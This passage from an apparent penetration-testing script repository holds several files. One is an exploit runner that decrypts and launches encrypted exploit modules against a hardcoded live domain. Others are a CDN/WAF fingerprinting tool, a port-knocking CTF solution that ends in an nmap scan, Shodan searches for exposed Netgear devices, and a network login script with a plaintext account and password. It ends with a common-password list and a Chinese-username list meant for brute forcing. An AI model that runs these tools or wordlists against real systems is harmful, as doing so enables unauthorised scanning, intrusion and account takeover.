'6ff51d6ad8855be91270868f2f9d9b2e225c722941906d5c0728a9409ef23b50', 'expback_2067pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_75pyc_dis.py': '3f9632f701953df91e7b13b428d18ab7a549520831cc2a46984c83e81b933673', 'expback_62pyc_dis.py': 'de92d01ce1a391792c2d4f41996a0b77c6c47605f032bdca21b0b5fd36c0f0f6', 'expback_1786pyc_dis.py': 
'345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_1745pyc_dis.py': '39b9843a532fed97e232f0a471ffbfb4079d8163a5e7dd52681e57c1e6520e53', 'expback_61pyc_dis.py': 'e1244c9d55465d4083a2a832fc4732472b91426238d7935d0e39126138afdac1', 'expback_39pyc_dis.py': '9a176f89756545161a807d6b5803333756eccaaad7ea2daa4e5eeb6c37a09ec0', 'expback_58pyc_dis.py': '2ec6a4bd513d71efdaaccb3aaf5c27487aef537f6091d14fcce0617c29dbf424', 'expback_2110pyc_dis.py': '33d7e04bb6b1e472eddb674398e5a3fce8abed59863e43f727ad78498ed63c27', 'expback_13pyc_dis.py': '253f4221df8307dfb23c39726a022382162a520739738590c39520b032c15c30', 'expback_1995pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_71pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_37pyc_dis.py': 'bce1c8cb73e24b4a1518702a3080d00aad9583c2a25f4c59b4dffb06c009a25f', 'expback_101pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_25pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_16pyc_dis.py': 'f5cebead3a728f681d272e67879a393bc37e3c857076d1b09926eeee1a34739b', 'expback_45pyc_dis.py': '6eaf26b1043248ae94ca258db5d5b068a610a213aa1d2af703532163d0bd1717', 'expback_30pyc_dis.py': 'e034570d4d73b2deeed98ff76911c89ff03ae6f0cef61a09f4091b55783c18b2', 'expback_102pyc_dis.py': '1d2d57097a9f25403de685038570b272b68e61ec0ad821f5db4ce2e380ba4f4e', 'expback_19pyc_dis.py': 'bce1c8cb73e24b4a1518702a3080d00aad9583c2a25f4c59b4dffb06c009a25f', 'expback_1062pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_17pyc_dis.py': 'b9e36259d273b00edcbf28048f0b716e08634efaab283f693ca067fe2162f575', 'expback_36pyc_dis.py': '145f01b740b46451cc03bbae9d56fe31e385aa681381a9f4ce445f7997baeff5', 'expback_74pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_641pyc_dis.py': 
'bb4d873dfab45ce19dbb43ea954ddf1248a2a41fd1a72f6feb52c058c767b317', 'exp622.py': '145f01b740b46451cc03bbae9d56fe31e385aa681381a9f4ce445f7997baeff5', 'expback_73pyc_dis.py': 'c3facf1cb2752b65516b130189a508e1469f38055b509392cba7b314ffa070fb', 'expback_1071pyc_dis.py': '0d4af56f54b549460eae50cb9dc579022c7e046e050fbc72242da5f616e21867', 'expback_2066pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_1056pyc_dis.py': 'd876bfdb7f8cc8e92678c67ed1db7e37a95dd5ef8aaeb304cb7f8a8e86dd9dbc'} 23 | dekey_dic = {'expback_64pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_2066pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_57pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'exp2366.py': '', 'exp2016.py': '', 'expback_100pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_1055pyc_dis.py': '7b650aed66397b6e1ba67dfdd39c9626c4c9fec89eebf397a76caa9d0ce45d26', 'expback_45pyc_dis.py': '6eaf26b1043248ae94ca258db5d5b068a610a213aa1d2af703532163d0bd1717', 'expback_22pyc_dis.py': '3f9632f701953df91e7b13b428d18ab7a549520831cc2a46984c83e81b933673', 'expback_25pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_15pyc_dis.py': '', 'expback_28pyc_dis.py': 'c3ff499db0ad225bc0cbd0f9cbd7910edaa8861a1f3ebe4cc7b168d1bdad3254', 'expback_13pyc_dis.py': '253f4221df8307dfb23c39726a022382162a520739738590c39520b032c15c30', 'expback_61pyc_dis.py': 'e1244c9d55465d4083a2a832fc4732472b91426238d7935d0e39126138afdac1', 'expback_33pyc_dis.py': '48a2a41fd1a72f6feb52c058c767b31726ef9480f5624b9733cf8088e26475b6', 'expback_1071pyc_dis.py': '3d500608da701822cdb9d87c98f28f44eb85b9df06157f3719926283397b40f0', 'expback_101pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_23pyc_dis.py': 'e0a46b005bc3e4b63bf33f9097023d87614810c0b71a355e0934a7bc8a862f32', 
'expback_29pyc_dis.py': '24000815b2f04e2f070d02f649539c6c6330a1bc45ad798962466966b7a220a4', 'expback_39pyc_dis.py': '9a176f89756545161a807d6b5803333756eccaaad7ea2daa4e5eeb6c37a09ec0', 'expback_59pyc_dis.py': '6ff51d6ad8855be91270868f2f9d9b2e225c722941906d5c0728a9409ef23b50', 'expback_62pyc_dis.py': 'de92d01ce1a391792c2d4f41996a0b77c6c47605f032bdca21b0b5fd36c0f0f6', 'expback_2065pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_1070pyc_dis.py': '', 'expback_2112pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_98pyc_dis.py': '', 'exp1484.py': '', 'expback_82pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_1056pyc_dis.py': 'd876bfdb7f8cc8e92678c67ed1db7e37a95dd5ef8aaeb304cb7f8a8e86dd9dbc', 'expback_1756pyc_dis.py': 'ab5d21d688e5789a47b617d47dc68e48a51243b1b93d3beaf737e411310753fe', 'expback_953pyc_dis.py': '', 'expback_63pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_60pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_83pyc_dis.py': 'dd9108e2cb4dce78981dc247e24bd0df5c4b004058ebf271788a8e792d85a026', 'expback_2083pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_641pyc_dis.py': 'bb4d873dfab45ce19dbb43ea954ddf1248a2a41fd1a72f6feb52c058c767b317', 'expback_1766pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_2110pyc_dis.py': '33d7e04bb6b1e472eddb674398e5a3fce8abed59863e43f727ad78498ed63c27', 'exp679.py': '', 'expback_19pyc_dis.py': '8505495a868258d1a09f88cf12b87431531bedca34a3dafc03ab58d741c0bbd7', 'expback_76pyc_dis.py': '0d98a92bbfd99bbfbcf9419d686661ac36d55d2a7ecc0c19768b0d7b0bd9191d', 'expback_70pyc_dis.py': 'efb1fdfd9905e92bacd3a5367c4727dc7ae722ab7f214e1434b6e25041d34190', 'exp2106.py': '', 'expback_72pyc_dis.py': '8c97d8c12ebb049684db59720d39ad8b38b0081d8cc8d022bd7768ab0bc7c699', 
'expback_73pyc_dis.py': 'c3facf1cb2752b65516b130189a508e1469f38055b509392cba7b314ffa070fb', 'expback_89pyc_dis.py': '0d4af56f54b549460eae50cb9dc579022c7e046e050fbc72242da5f616e21867', 'expback_18pyc_dis.py': '54cf6db8b1c27e5c0c73a151a9a0ccdd7b3e2dbccc5c00c041c3479d205a62c4', 'expback_77pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_30pyc_dis.py': 'e034570d4d73b2deeed98ff76911c89ff03ae6f0cef61a09f4091b55783c18b2', 'exp2355.py': '', 'expback_65pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'exp4.py': '', 'expback_2067pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_35pyc_dis.py': '', 'expback_6pyc_dis.py': '3f9632f701953df91e7b13b428d18ab7a549520831cc2a46984c83e81b933673', 'expback_1994pyc_dis.py': 'ffcc396606397e831f857f22b90d87ca05dd77452e7c2760df0f39d9d3f664cb', 'expback_1062pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_1786pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_58pyc_dis.py': '2ec6a4bd513d71efdaaccb3aaf5c27487aef537f6091d14fcce0617c29dbf424', 'expback_24pyc_dis.py': 'a27d8237a5f282cdeae742d17cd4e2ca40a686f9debe7307d414394cf8eb469a', 'exp2357.py': '', 'expback_34pyc_dis.py': 'd289da3e7b9c736756e3429c23db20228f8e3547d3a4b540da1f86aaf22ff02f', 'exp622.py': '', 'expback_17pyc_dis.py': 'b9e36259d273b00edcbf28048f0b716e08634efaab283f693ca067fe2162f575', 'expback_36pyc_dis.py': '145f01b740b46451cc03bbae9d56fe31e385aa681381a9f4ce445f7997baeff5', 'expback_54pyc_dis.py': '4903f9969575cdef55f7b2ed2a12f89b97664e7fb5eb0898e6fd4f6775f166f3', 'expback_12pyc_dis.py': 'e3bb69fcc78187a0039fccb03c46298456d5ffb095a1203945c91c59ca3e1993', 'expback_71pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_8pyc_dis.py': 'f8302acee10371dc21ac9029b3a35f45bcdc1b3ecfefefb25771bac202ac32ec', 'expback_811pyc_dis.py': 
'f8feb1e2013b989686230a93b8a543f2db83f2cc6b4dbc40f8b30bdf5e0dfeb9', 'expback_75pyc_dis.py': '3f9632f701953df91e7b13b428d18ab7a549520831cc2a46984c83e81b933673', 'exp1962.py': '', 'expback_1995pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_1745pyc_dis.py': '39b9843a532fed97e232f0a471ffbfb4079d8163a5e7dd52681e57c1e6520e53', 'exp849.py': '', 'expback_16pyc_dis.py': 'f5cebead3a728f681d272e67879a393bc37e3c857076d1b09926eeee1a34739b', 'expback_88pyc_dis.py': 'e77e60afe46271e855a1aaf4738acb8d2712649d7a0e38ee6de5e3cb6e102b19', 'expback_2078pyc_dis.py': '28221b5847a673c1d138bec680e5aab1421a9eed705aca4c316159fd2291b910', 'expback_74pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_26pyc_dis.py': 'bb4d873dfab45ce19dbb43ea954ddf1248a2a41fd1a72f6feb52c058c767b317', 'expback_189pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_37pyc_dis.py': 'bce1c8cb73e24b4a1518702a3080d00aad9583c2a25f4c59b4dffb06c009a25f', 'expback_102pyc_dis.py': '1d2d57097a9f25403de685038570b272b68e61ec0ad821f5db4ce2e380ba4f4e', 'expback_38pyc_dis.py': '8505495a868258d1a09f88cf12b87431531bedca34a3dafc03ab58d741c0bbd7','expback_1054pyc_dis.py':'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0'} 24 | 25 | try: 26 | de_key = dekey_dic[filename] 27 | except: 28 | return '' 29 | decode = Decoder(binascii.a2b_hex(de_key)).decode 30 | return decode 31 | 32 | sys.path.append(EXP_DIR) 33 | _G = { 34 | 'scanport':False, 35 | 'subdomain': False, 36 | 'target': 'www.zgqmlt.com', 37 | 'disallow_ip':['127.0.0.1'], 38 | 'kv' : {}, 39 | #'user_dict':'http://192.168.0.158/1.txt' 40 | #'pass_dict':'http://192.168.0.158/1.txt' 41 | } 42 | 43 | util._G = _G 44 | 45 | import sys 46 | 47 | def debug(fmt, *args): 48 | print(fmt % args) 49 | sys.stdout.flush() 50 | 51 | LEVEL_NOTE = 0 52 | LEVEL_INFO =1 53 | LEVEL_WARNING = 2 54 | LEVEL_HOLE = 3 55 | 56 | def _problem(level, body, uuid=None, 
log=[]): 57 | debug('[LOG] <%s> %s (uuid=%s)', ['note', 'info', 'warning', 'hole'][level], body,str(uuid)) 58 | if log: 59 | if isinstance(log,dict): 60 | log=[log] 61 | for l in log: 62 | print l['response'][:200] 63 | sys.stdout.flush() 64 | 65 | 66 | security_note = partial(_problem,LEVEL_NOTE) 67 | security_info = partial(_problem,LEVEL_INFO) 68 | security_warning = partial(_problem,LEVEL_WARNING) 69 | security_hole = partial(_problem,LEVEL_HOLE) 70 | 71 | def task_push(service, arg, uuid = None, target=None): 72 | if uuid is None: 73 | uuid = str(arg) 74 | 75 | debug('[JOB] <%s> %s (%s/%s)', service, arg, uuid, target) 76 | import os 77 | for path, subdirs, files in os.walk(EXP_DIR): 78 | for fname in files: 79 | if not fname.endswith('.py'): continue 80 | #print fname 81 | pname = fname[:-3] 82 | #try: 83 | # print pname 84 | plg = __import__(pname) 85 | # print plg.__dict__.keys() 86 | #mod = plg.__dict__[name] 87 | mod = plg 88 | mod.decode = get_decode(fname) 89 | mod.curl = curl 90 | mod.security_note = security_note 91 | mod.security_info = security_info 92 | mod.security_warning = security_warning 93 | mod.security_hole = security_hole 94 | mod.util = util 95 | res = None 96 | # if no assign -> res = (True, arg) 97 | if not mod.__dict__.has_key('assign'): 98 | res = (True, arg) 99 | else: 100 | # if assign Success -> res = (True, arg) 101 | # if assign fail -> res = None 102 | res = mod.assign(service, arg) 103 | 104 | 105 | try: 106 | mod.audit(res[1]) 107 | except Exception as e: 108 | pass 109 | #except Exception as e: 110 | # pass 111 | 112 | if __name__ == '__main__': 113 | f = open('target.txt') 114 | for target in f: 115 | target = target.strip() 116 | #print target 117 | task_push('www',target,'uuidxxxxxxxxxxxxxxxxx',target) 118 | -------------------------------------------------------------------------------- /Python/cdn_identify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 
encoding: utf-8 3 | # 根据ip range和 header判断,合成的轮子。 4 | # 使用方法./cdn_identify.py http://jiasule.com 5 | 6 | 7 | from requests import session 8 | from base64 import b64decode 9 | import netaddr 10 | from netaddr import IPNetwork, IPAddress 11 | import socket 12 | from urlparse import urlparse 13 | 14 | class Fingerprint(object): 15 | def __init__(self): 16 | self.s = session() 17 | self.s.headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' 18 | 19 | def detect(self, url): 20 | cdn_list = {'ips_cdn_cloudflare':['199.27.128.0/21','173.245.48.0/20','103.21.244.0/22','103.22.200.0/22','103.31.4.0/22','141.101.64.0/18','108.162.192.0/18','190.93.240.0/20','188.114.96.0/20','197.234.240.0/22','198.41.128.0/17','162.158.0.0/15','104.16.0.0/12'], 21 | 'ips_cdn_360': ['183.136.133.0-183.136.133.255','220.181.55.0-220.181.55.255','101.226.4.0-101.226.4.255','180.153.235.0-180.153.235.255','122.143.15.0-122.143.15.255','27.221.20.0-27.221.20.255','202.102.85.0-202.102.85.255','61.160.224.0-61.160.224.255','112.25.60.0-112.25.60.255','182.140.227.0-182.140.227.255','221.204.14.0-221.204.14.255','222.73.144.0-222.73.144.255','61.240.144.0-61.240.144.255','113.17.174.0-113.17.174.255','125.88.189.0-125.88.189.255','125.88.190.0-125.88.190.255','120.52.18.1-120.52.18.255'], 22 | 'ips_cdn_jiasule':['119.188.35.0-119.188.35.255','61.155.222.0-61.155.222.255','218.65.212.0-218.65.212.255','116.211.121.0-116.211.121.255','103.15.194.0-103.15.194.255','61.240.149.0-61.240.149.255','222.240.184.0-222.240.184.255','112.25.16.0-112.25.16.255','59.52.28.0-59.52.28.255','211.162.64.0-211.162.64.255','180.96.20.0-180.96.20.255','103.1.65.0-103.1.65.255'], 23 | 'ips_cdn_anquanbao' 
:['220.181.135.1-220.181.135.255','115.231.110.1-115.231.110.255','124.202.164.1-124.202.164.255','58.30.212.1-58.30.212.255','117.25.156.1-117.25.156.255','36.250.5.1-36.250.5.255','183.60.136.1-183.60.136.255','183.61.185.1-183.61.185.255','14.17.69.1-14.17.69.255','120.197.85.1-120.197.85.255','183.232.29.1-183.232.29.255','61.182.141.1-61.182.141.255','182.118.12.1-182.118.12.255','182.118.38.1-182.118.38.255','61.158.240.1-61.158.240.255','42.51.25.1-42.51.25.255','119.97.151.1-119.97.151.255','58.49.105.1-58.49.105.255','61.147.92.1-61.147.92.255','69.28.58.1-69.28.58.255','176.34.28.1-176.34.28.255','54.178.75.1-54.178.75.255','112.253.3.1-112.253.3.255','119.167.147.1-119.167.147.255','123.129.220.1-123.129.220.255','223.99.255.1-223.99.255.255','117.34.72.1-117.34.72.255','117.34.91.1-117.34.91.255','123.150.187.1-123.150.187.255','221.238.22.1-221.238.22.255','125.39.32.1-125.39.32.255','125.39.191.1-125.39.191.255','125.39.18.1-125.39.18.255','14.136.130.1-14.136.130.255','210.209.122.1-210.209.122.255','111.161.66.1-111.161.66.255'], 24 | 'ips_cdn_incapsula':['199.83.128.0/21','198.143.32.0/19','149.126.72.0/21','103.28.248.0/22','45.64.64.0/22','185.11.124.0/22 ','192.230.64.0/18'], 25 | 'ips_cdn_yunjiasu':['222.216.190.0-222.216.190.255','61.155.149.0-61.155.149.255','119.188.14.0-119.188.14.255','61.182.137.0-61.182.137.255','117.34.28.0-117.34.28.255','119.188.132.0-119.188.132.255','42.236.7.0-42.236.7.255','183.60.235.0-183.60.235.255','117.27.149.0-117.27.149.255','216.15.172.0/24']} 26 | 27 | cc = [] 28 | try: 29 | ips = socket.gethostbyname_ex(url.split('/')[2]) 30 | except socket.gaierror: 31 | ips=[] 32 | for ip_addr in ips[2]: 33 | for cdn in cdn_list: 34 | for cidr in cdn_list[cdn]: 35 | if '-' in cidr: 36 | l = cidr.split('-') 37 | ip_range = netaddr.iter_iprange(l[0],l[1]) 38 | ip_range = netaddr.cidr_merge(ip_range) 39 | for i in ip_range: 40 | if ip_addr in i: 41 | cc.append(cdn) 42 | else: 43 | pass 44 | else: 45 | if ip_addr in cidr: 
46 | cc.append(cdn) 47 | print '------------cidr--------------' 48 | print cc 49 | resp = self.s.get(url, allow_redirects=False, verify=False) 50 | if resp.history: 51 | headers = resp.history[0].headers 52 | cookies = resp.history[0].cookies 53 | else: 54 | headers = resp.headers 55 | cookies = resp.cookies 56 | 57 | result = [] 58 | for prop in dir(self): 59 | if prop.startswith('finger_'): 60 | func = getattr(self, prop) 61 | r = func(headers, cookies) 62 | if r: 63 | result.append(r) 64 | print '------------header------------' 65 | print result 66 | return result 67 | 68 | 69 | 70 | 71 | 72 | def finger_jiasule(self, headers, cookies): 73 | if '__jsluid' in cookies.keys(): 74 | return 'jiasule' 75 | 76 | def finger_cloudflare(self, headers, cookies): 77 | if '__cfduid' in cookies.keys(): 78 | return 'cloudflare' 79 | elif 'cloudflare' in headers.get('server', ''): 80 | return 'cloudflare' 81 | 82 | def finger_360webscan(self, headers, cookies): 83 | if 'webscan.360.cn' in headers.get('x-safe-firewall', ''): 84 | return '360webscan' 85 | 86 | def finger_360wzb(self, headers, cookies): 87 | if headers.get('x-powered-by-360wzb') != None: 88 | return '360wzb' 89 | 90 | def finger_anquanbao(self, headers, cookies): 91 | if headers.get('x-powered-by-anquanbao') != None: 92 | return 'anquanbao' 93 | 94 | def finger_incapsula(self, headers, cookies): 95 | if 'incapsula' in headers.get('x-cdn', '').lower(): 96 | return 'incapsula' 97 | if any(map(lambda item: item.startswith(('incap_ses', 'visid_incap_')), cookies.keys())): 98 | return 'incapsula' 99 | 100 | def finger_yunjiasu(self, headers, cookies): 101 | x_server = headers.get('x-server', '') 102 | try: 103 | if b64decode(x_server).endswith('.fhl'): 104 | return 'yunjiasu' 105 | except: 106 | return 107 | 108 | if __name__ == '__main__': 109 | from sys import argv 110 | 111 | f = Fingerprint() 112 | f.detect(argv[1]) 113 | -------------------------------------------------------------------------------- 
/Python/drcom2.6.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import urllib 3 | import urllib2 4 | from time import sleep 5 | 6 | url = 'http://192.168.168.168' 7 | values = ({ 8 | '0MKKey' : '%B5%C7%C2%BC%20Login', 9 | 'DDDDD' : '1100B0100', 10 | 'upass' : '226295' 11 | }) 12 | data = urllib.urlencode(values) 13 | data = data.encode('utf-8') 14 | def usage(): 15 | print(''' 16 | Usage: 17 | 18 | ./drcom i //log in 19 | ./drcom o //log out 20 | ''') 21 | 22 | if __name__ == "__main__": 23 | if(len(sys.argv) != 2): 24 | usage() 25 | sys.exit() 26 | elif(sys.argv[1] == 'o'): 27 | l = urllib2.urlopen('http://192.168.168.168/F.htm') 28 | if (l): 29 | print('\nyou have loged out!\n') 30 | sys.exit() 31 | elif(sys.argv[1] == 'i'): 32 | req = urllib2.Request(url, data) 33 | response = urllib2.urlopen(req) 34 | if(response): 35 | d = response.read() 36 | #print(d.decode("gb2312")) 37 | print('\nyou have loged in!!\n ') 38 | sys.exit() 39 | else: 40 | usage() 41 | sys.exit() 42 | -------------------------------------------------------------------------------- /Python/port_knocking.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # sheldon.py 3 | # EINDBAZEN solution to port knocking challenge PHD CTF Quals 2011 4 | 5 | # Import scapy 6 | from scapy.all import * 7 | conf.verb = 0 8 | # Ports 9 | ports = [951, 4826, 9402, 235, 16821, 443, 100] 10 | # Knock twice on every port 11 | for dport in range(0, len(ports)): 12 | print "[*] Knocking on 192.168.0.5: " , ports[dport] 13 | ip = IP(dst="192.168.0.5") 14 | port = 39367 15 | SYN = ip/TCP(sport=port, dport=ports[dport], flags="S", window=2048, options=[('MSS',1460)], seq=0) 16 | send(SYN) ; print "*KNOCK*" 17 | port = 39368 18 | SYN = ip/TCP(sport=port, dport=ports[dport], flags="S", window=2048, options=[('MSS',1460)], seq=0) 19 | send(SYN) ; print "*KNOCK*" 20 | print "PENNY" 21 | # Use NMAP for scanning 
for open ports 22 | # We also use -sV, so nmap connects to the port and get the flag 23 | print "[*] Scanning for open ports using nmap" 24 | subprocess.call("nmap -sS -sV -T4 -p 1024-2048 192.168.0.5", shell=True) 25 | -------------------------------------------------------------------------------- /Python/port_knocking.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | HOST=$1 3 | shift 4 | for ARG in "$@" 5 | do 6 | nmap -Pn --host_timeout 100 --max-retries 0 -p $ARG $HOST 7 | done 8 | 9 | #usage [root:~]# ./knock.sh 10.0.1.113 7000 8000 9000 7000 8000 && telnet 10.0.1.113 8888 10 | -------------------------------------------------------------------------------- /Python/readlog/read.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/readlog/read.txt -------------------------------------------------------------------------------- /Python/readlog/readlog.py: -------------------------------------------------------------------------------- 1 | #encoding=utf8 2 | import re 3 | 4 | f = open("../log1.txt") # 返回一个文件对象 5 | line = f.readline() # 调用文件的 readline()方法 6 | count=1 7 | while line: 8 | #print count 9 | #count=count+1 10 | #print line, # 后面跟 ',' 将忽略换行符 11 | name=re.findall(r"Account Name:\s{2}(.*)\r\r",str(line)) 12 | sourceip=re.findall(r"Source Network Address:\s(.*)\r\r",str(line)) 13 | if sourceip: 14 | print sourceip 15 | if name: 16 | print name 17 | #print type(line) 18 | # print(line, end = '')   # 在 Python 3中使用 19 | line = f.readline() 20 | 21 | f.close() 22 | -------------------------------------------------------------------------------- /Python/shodan/.DS_Store: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/shodan/.DS_Store -------------------------------------------------------------------------------- /Python/shodan/get.py: -------------------------------------------------------------------------------- 1 | import shodan 2 | 3 | def shodanSearch(keywords): 4 | 5 | SHODAN_API_KEY = "x" 6 | api = shodan.Shodan(SHODAN_API_KEY) 7 | 8 | iplist = [] 9 | total = 0 10 | 11 | try: 12 | results = api.search(keywords) 13 | total = int(results['total']) 14 | for result in results['matches']: iplist.append({"ip":result['ip_str'],"country":result['location']['country_name']}) 15 | return total,iplist 16 | 17 | except shodan.APIError, e: 18 | print 'Error: %s' % e 19 | 20 | 21 | print shodanSearch('netgear country:"AU"') 22 | -------------------------------------------------------------------------------- /Python/shodan/search.py: -------------------------------------------------------------------------------- 1 | import shodan 2 | 3 | SHODAN_API_KEY = "x" 4 | 5 | api = shodan.Shodan(SHODAN_API_KEY) 6 | 7 | 8 | try: 9 | # Search Shodan 10 | results = api.search('netgear country:"AU"') 11 | 12 | # Show the results 13 | print 'Results found: %s' % results['total'] 14 | for result in results['matches']: 15 | print '%s %s' % (result['ip_str'],result['port']) 16 | #print result['data'] 17 | print '' 18 | except shodan.APIError, e: 19 | print 'Error: %s' % e 20 | -------------------------------------------------------------------------------- /Python/top500/Top100Pwd.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | a123456 3 | 123456a 4 | 5201314 5 | 111111 6 | woaini1314 7 | qq123456 8 | 123123 9 | 000000 10 | 1qaz2wsx 11 | 1q2w3e4r 12 | qwe123 13 | 7758521 14 | 123qwe 15 | a123123 16 | 123456aa 17 | woaini520 18 | woaini 19 | 100200 20 | 1314520 21 | woaini123 22 | 123321 23 | q123456 24 | 123456789 25 | 123456789a 26 | 
5211314 27 | asd123 28 | a123456789 29 | z123456 30 | asd123456 31 | a5201314 32 | aa123456 33 | zhang123 34 | aptx4869 35 | 123123a 36 | 1q2w3e4r5t 37 | 1qazxsw2 38 | 5201314a 39 | 1q2w3e 40 | aini1314 41 | 31415926 42 | q1w2e3r4 43 | 123456qq 44 | woaini521 45 | 1234qwer 46 | a111111 47 | 520520 48 | iloveyou 49 | abc123 50 | 110110 51 | 111111a 52 | 123456abc 53 | w123456 54 | 7758258 55 | 123qweasd 56 | 159753 57 | qwer1234 58 | a000000 59 | qq123123 60 | zxc123 61 | 123654 62 | abc123456 63 | 123456q 64 | qq5201314 65 | 12345678 66 | 000000a 67 | 456852 68 | as123456 69 | 1314521 70 | 112233 71 | 521521 72 | qazwsx123 73 | zxc123456 74 | abcd1234 75 | asdasd 76 | 666666 77 | love1314 78 | QAZ123 79 | aaa123 80 | q1w2e3 81 | aaaaaa 82 | a123321 83 | 123000 84 | 11111111 85 | 12qwaszx 86 | 5845201314 87 | s123456 88 | nihao123 89 | caonima123 90 | zxcvbnm123 91 | wang123 92 | 159357 93 | 1A2B3C4D 94 | asdasd123 95 | 584520 96 | 753951 97 | 147258 98 | 1123581321 99 | 110120 100 | qq1314520 -------------------------------------------------------------------------------- /Python/top500/Top500Name.txt: -------------------------------------------------------------------------------- 1 | zhangwei 2 | wangwei 3 | wangfang 4 | liwei 5 | lina 6 | zhangmin 7 | lijing 8 | wangjing 9 | liuwei 10 | wangxiuying 11 | zhangli 12 | lixiuying 13 | wangli 14 | zhangjing 15 | zhangxiuying 16 | liqiang 17 | wangmin 18 | limin 19 | wanglei 20 | liuyang 21 | wangyan 22 | wangyong 23 | lijun 24 | zhangyong 25 | lijie 26 | zhangjie 27 | zhanglei 28 | wangqiang 29 | lijuan 30 | wangjun 31 | zhangyan 32 | zhangtao 33 | wangtao 34 | liyan 35 | wangchao 36 | liming 37 | liyong 38 | wangjuan 39 | liujie 40 | liumin 41 | lixia 42 | lili 43 | zhangjun 44 | wangjie 45 | zhangqiang 46 | wangxiulan 47 | wanggang 48 | wangping 49 | liufang 50 | zhangyan 51 | liuyan 52 | liujun 53 | liping 54 | wanghui 55 | wangyan 56 | chenjing 57 | liuyong 58 | liling 59 | liguiying 60 | wangdan 61 | ligang 62 | 
lidan 63 | liping 64 | wangpeng 65 | liutao 66 | chenwei 67 | zhanghua 68 | liujing 69 | litao 70 | wangguiying 71 | zhangxiulan 72 | lihong 73 | lichao 74 | liuli 75 | zhangguiying 76 | wangyulan 77 | liyan 78 | zhangpeng 79 | lixiulan 80 | zhangchao 81 | wangling 82 | zhangling 83 | lihua 84 | wangfei 85 | zhangyulan 86 | wangguilan 87 | wangying 88 | liuqiang 89 | chenxiuying 90 | liying 91 | lihui 92 | limei 93 | chenyong 94 | wangxin 95 | lifang 96 | zhangguilan 97 | libo 98 | yangyong 99 | wangxia 100 | ligui 101 | wangbin 102 | lipeng 103 | zhangping 104 | zhangli 105 | zhanghui 106 | zhangyu 107 | liujuan 108 | libin 109 | wanghao 110 | chenjie 111 | wangkai 112 | chenli 113 | chenmin 114 | wangxiu 115 | liyu 116 | liuxiu 117 | wangping 118 | zhangbo 119 | liugui 120 | yangxiu 121 | zhangying 122 | yangli 123 | zhangjian 124 | lijun 125 | lili 126 | wangbo 127 | zhanghong 128 | 